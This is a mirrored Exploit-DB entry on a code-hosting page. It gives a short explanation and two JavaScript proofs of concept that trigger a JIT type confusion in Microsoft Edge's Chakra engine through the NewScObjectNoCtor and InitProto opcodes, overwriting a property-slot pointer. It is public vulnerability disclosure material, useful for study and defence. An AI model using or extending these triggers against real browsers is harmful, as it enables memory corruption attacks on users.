bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/46203.txt
Offensive Security 40d3df51a4 DB: 2019-01-19 
18 changes to exploits/shellcodes

Watchr 1.1.0.0 - Denial of Service (PoC)
One Search 1.1.0.0 - Denial of Service (PoC)
Eco Search 1.0.2.0 - Denial of Service (PoC)
7 Tik 1.0.1.0 - Denial of Service (PoC)
VPN Browser+ 1.1.0.0 - Denial of Service (PoC)
FastTube 1.0.1.0 - Denial of Service (PoC)
Microsoft Edge Chakra - 'InlineArrayPush' Type Confusion
Microsoft Edge Chakra - 'NewScObjectNoCtor' or 'InitProto' Type Confusion
Microsoft Edge Chakra - 'InitClass' Type Confusion
Microsoft Edge Chakra - 'JsBuiltInEngineInterfaceExtensionObject::InjectJsBuiltInLibraryCode' Use-After-Free
Webmin 1.900 - Remote Command Execution (Metasploit)
SCP Client - Multiple Vulnerabilities (SSHtranger Things)
SeoToaster Ecommerce / CRM / CMS 3.0.0 - Local File Inclusion
phpTransformer 2016.9 - SQL Injection
phpTransformer 2016.9 - Directory Traversal
Joomla! Core 3.9.1 - Persistent Cross-Site Scripting in Global Configuration Textfilter Settings
Pydio / AjaXplorer < 5.0.4 - Unauthenticated Arbitrary File Upload
2019-01-19 05:01:57 +00:00

61 lines
No EOL
1 KiB
Text
Raw Blame History

NewScObjectNoCtor and InitProto opcodes are treated as having no side effects, but actually they can have via the SetIsPrototype method of the type handler that can cause transition to a new type. This can lead to type confusion in the JITed code.
In the PoC, it overwrites the pointer to property slots with 0x1000000001234.
PoC for NewScObjectNoCtor:
function cons() {
}
function opt(o, value) {
o.b = 1;
new cons();
o.a = value;
}
function main() {
for (let i = 0; i < 2000; i++) {
cons.prototype = {};
let o = {a: 1, b: 2};
opt(o, {});
}
let o = {a: 1, b: 2};
cons.prototype = o;
opt(o, 0x1234);
print(o.a);
}
main();
PoC for InitProto:
function opt(o, proto, value) {
o.b = 1;
let tmp = {__proto__: proto};
o.a = value;
}
function main() {
for (let i = 0; i < 2000; i++) {
let o = {a: 1, b: 2};
opt(o, {}, {});
}
let o = {a: 1, b: 2};
opt(o, o, 0x1234);
print(o.a);
}
main();
Reference in a new issue View git blame Copy permalink